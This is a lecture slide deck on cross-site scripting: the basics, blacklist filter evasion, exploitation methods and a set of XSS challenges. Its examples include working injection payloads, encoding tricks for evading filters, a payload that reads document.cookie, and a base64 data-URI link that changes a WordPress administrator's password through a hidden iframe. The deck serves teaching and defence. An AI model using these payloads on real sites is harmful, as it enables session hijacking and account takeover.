Professional Documents
Culture Documents
●
Application Security background
●
Master's Thesis: “Automatic and Context-Aware Cross-Site Scripting Filter
Evasion”, supervisor: prof. d'Amore
●
XSS filter evasion tool: http://code.google.com/p/snuck/
●
Ranked 4th in the “Premio Clusit” as one of the most innovative Italian IT security
thesis in 2012
●
Security Consultant at Minded Security
●
Application Security Consulting & Security Research company
●
Interested in:
●
Web Application Security
●
Web Browser Security
●
Some bugs @ http://www.sneaked.net
Web App Security
●
Why web app sec is important?
●
Online platforms handling private data are becoming more and more popular
●
High benefits from the users perspective, but...
●
… such kind of applications fascinate the hackers!
●
Huge number of web app attacks registered in the last years
●
High probability of being attacked sooner or later
●
Accessing companies data possibly implies:
●
Customer loss
●
Reputation impact
●
Building a completely safe web app is not easy!
●
Many aspect should be taken into account (OWASP principles)
●
Attackers could be smart
●
Awareness is required among developers
XSS: Cross-Site Scripting
●
XSS is a web application vulnerability that exploits the trust a user has for a web site
●
The attacker's goal is to execute malicious code in the context of a trusted web site
●
Practical example?
Hey <?php echo $_GET['name']; ?>, how are u?
The application reflects the name given in the GET parameter called name.
http://target.net/page.php?name=superman
But the attacker could inject its own code in order to execute JavaScript
http://target.net/page.php?name=<script>alert(1)</script>
●
How is XSS related to SOP?
●
The attacker can inject code in the target domain
●
The web browser cannot distinguish among a benign and a malicious script
●
Therefore it executes it
●
This means that the attacker can access the data in that domain since this is perfectly legit
from the SOP perspective
●
External JavaScript running on your domain!
<html>
<body>
<script>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</script>
</body>
</html>
●
Web Vulnerability Scanners
●
Tools that address the vulnerabilities detection problem by automating the whole
discovery process
●
The existing literature showed many intrinsic limitations:
●
False positives
●
Crawling problem
●
Poor coverage of data entry points
●
Intended Workflow
●
How should the application be used?
XSS filter: sanitization system that prevents malicious code to be supplied through a
form or, more generally, through a data entry point in a web application
Some examples
●
Basic XSS #1
<html>
<body>
<script>
var my_variable = “<?= $_GET['test']; ?>”;
// handle my_variable here
</script>
</body>
</html>
●
Stopping <script>alert(1)</script> or similars would not
make the app XSS-safe!
●
The attacker could still inject <a href=javascript:alert(1)>xxx
Filtering (cont.d)
●
Dumb Filtering Example #2
●
Idea: stripping out double quotes to avoid attribute breaking
Obviously vulnerable:
http://target/page.php?id=);prompt(document.cookie)//
Attacker's perspective: is there any chance to make a successful injection without using
parentheses?
Filtering (cont.d)
●
Dumb Filtering Example #2
Attacker's perspective: is there any chance to make a successful injection without using
parentheses? Yes!
http://target/page.php?id=location.href='javascript:prompt%2528/mauro%20rocks/%2529'
Developer's perspective: disallowing colons will block the attacker to generate these
malicious redirects
Attacker's perspective: is there any chance to make a successful injection without using
these characters?
Filtering (cont.d)
●
Dumb Filtering Example #2
Attacker's perspective: is there any chance to make a successful injection without using
colons? Yes!
http://target/page.php?id=location.href='javascript%26%2358;prompt%2528/mauro
%20rocks/%2529'
●
XSS cannot be solved through a blacklist, whereas a whitelist approach allows to
successfully handle such situations
●
We can continue to fix over and over as the attacker will always find a way to obfuscate its
own payload
●
XSS is related to the context, therefore output encoding should be carried out on the basis
of the context the supplied data will be reflected into
●
Solution: use web application security control library, such as OWASP ESAPI
Filtering (cont.d)
The mentioned issue could have been simply handled through input validation, as follows:
●
However, these are very basic attack scenarios...
●
Allowing users to share its own content, while giving them a wide degree of freedom
in terms of allowed inputs, may become challenging
●
The complexity raises as the number of possible data entry points in which users
might marshal content increases
Exploitation
●
How to exploit an XSS
●
Exploiting vulnerabilities requires creativity as it is quite application-dependent
●
Evading robust filters requires strong ninja skills
●
Some attack vectors may work in a browser, but not in another
●
A smart exploit would require to know the basic application logic
●
Exploit methodologies
●
Session Hijacking – steal session information to impersonate the victim
●
Modifying user credentials
●
Stealing anti-CSRF tokens – perform unwanted actions on the victim's behalf
●
Phishing attacks
●
Control the whole user session
<a
href="feed:data:text/html;base64,PHNjcmlwdD4KZnVuY3Rpb24gc3RhcnQoKSB
7CnZhciBwd2QgPSAibXluZXdwd2QiOwp2YXIgaWZyID0gZG9jdW1lbnQuZ2V0RWxlbWV
udHNCeVRhZ05hbWUoImlmcmFtZSIpWzBdOwp2YXIgaWZyRG9jID0gaWZyLmNvbnRlbnR
Eb2N1bWVudCB8fCBpZnIuY29udGVudFdpbmRvdy5kb2N1bWVudDsKdmFyIHRoZUZvcm0
gPSBpZnJEb2MuZ2V0RWxlbWVudHNCeU5hbWUoInBhc3MxIilbMF07CnRoZUZvcm0udmF
sdWUgPSBwd2Q7CnRoZUZvcm0gPSBpZnJEb2MuZ2V0RWxlbWVudHNCeU5hbWUoInBhc3M
yIilbMF07CnRoZUZvcm0udmFsdWUgPSBwd2Q7Cmlmci5vbmxvYWQ9ZnVuY3Rpb24oKXt
sb2NhdGlvbj0naHR0cDovLzEyNy4wLjAuMS9DTVMvd29yZHByZXNzLyc7fTsKaWZyRG9
jLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljaygpOwp9Cjwvc2NyaXB0Pgo8aWZ
yYW1lIHNyYz0iaHR0cDovLzEyNy4wLjAuMS9DTVMvd29yZHByZXNzL3dwLWFkbWluL3B
yb2ZpbGUucGhwIiB3aWR0aD0wIGhlaWdodD0wIG9ubG9hZD0ic3RhcnQoKSI+">CLICK
ME!!!</a>
●
Asking the admin to click the injected link makes him modify its own password!
●
data URIs inherit the origin of the opener in Firefox
●
feed scheme in Firefox <= 13
●
X-Frame-Options: SAMEORIGIN in WordPress
Here starts the fun...
●
We introduce 4 XSS challenges, that you should solve!
●
http://www.dis.uniroma1.it/~waslab/ - read the Note, it's important!
●
Increasing complexity
●
For any challenge you are asked to meet a goal
●
You are basically asked to manage a successful injection that allows to execute your own
code
●
Play hard and focus on the goals
●
Submit your solutions through the challenge itself
Challenge #1
●
URL: http://www.dis.uniroma1.it/~waslab/challenge-1.php
●
Complexity: basic
●
Goal: perform an alert([your_name rocks]) – for instance generate an alert('mauro
rocks')
●
Description: Your input is filtered in a very easy fashion
●
You need to “reverse” the filter function logic and inject HTML code aiming towards
executing JS code
<html>
<body>
<textarea>
<?= filter($_GET['test']); ?>
</textarea>
</body>
</html>
●
Example: http://www.dis.uniroma1.it/~waslab/challenge-1.php?
xss=nice_to_meet_u_xss
Challenge #2
●
URL: http://www.dis.uniroma1.it/~waslab/challenge-2.php
●
Complexity: basic
●
Goal: perform an alert([your_name]) – for instance generate an alert('mauro')
●
Description: Common XSS scenario
●
Your input is reflected in the attribute src of an image
<html>
<body>
<img src=”<?= filter($_GET['test']); ?>” />
</body>
</html>
●
Try with this: http://www.dis.uniroma1.it/~waslab/challenge-2.php?
xss=http://upload.wikimedia.org/wikipedia/commons/8/8a/Cat_eyes_2007-2.jpg
Challenge #3
●
URL: http://www.dis.uniroma1.it/~waslab/challenge-3.php
●
Complexity: medium
●
Goal: perform an alert('xss')
●
Description: Common XSS scenario in the case of persistent ones
●
You can inject HTML code, but you need to understand which whitelist is employed
●
Quite tricky since some annoying filtering mechanisms are adopted
<html>
<body>
<?= filter($_GET['test']); ?>
</body>
</html>
●
Try with this: http://www.dis.uniroma1.it/~waslab/challenge-3.php?xss=<h1>my
firSt injection</h1>
Challenge #4
●
URL: http://www.dis.uniroma1.it/~waslab/challenge-4.php
●
Complexity: advanced
●
Goal: perform an alert(1)
●
Description: Advanced XSS scenario
●
Two injection parameters
●
Puzzling filtering mechanisms are adopted
<script>
/* alert(<?= filter($_GET['a']); ?>=<?= filter2($_GET['b']); ?>) */
</script>
●
Squeeze your brain...!
Challenge (cont.d)
●
Hints will be provided if troubles arise
●
For further information – excluding solutions – mail @ gentile.mauro.mg@gmail.com
●
...and, last but not least, have fun guys!
●
In addition, we are working on some other challenges - refer to
http://www.dis.uniroma1.it/~waslab/
●
SQL Injection
●
Local File Inclusion
●
Command Execution
Recommended readings and resources
●
The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws,
Dafydd Stuttard, Marcus Pinto
●
Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-',
Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, David Lindsay
●
The Tangled Web: A Guide to Securing Modern Web Applications,
Michal Zalewski
●
Browser Security Handbook, http://code.google.com/p/browsersec/wiki/Main,
Michal Zalewski
●
domxsswiki, http://code.google.com/p/domxsswiki/,
Stefano Di Paola
●
Cross-site Scripting (XSS), https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29,
OWASP
●
Cross Site Scripting Attack , http://www.acunetix.com/websitesecurity/cross-site-scripting/,
Acunetix
●
Hackvertor, https://hackvertor.co.uk/public,
Gareth Heyes
Questions?
●
Thanks!
Mauro Gentile
Personal
Email: gentile.mauro.mg@gmail.com
Blog: http://www.sneaked.net
Twitter: @sneak_
Company
Email: mauro.gentile@mindedsecurity.com
Site: http://www.mindedsecurity.com
Blog: http://blog.mindedsecurity.com
Twitter: @mindedsecurity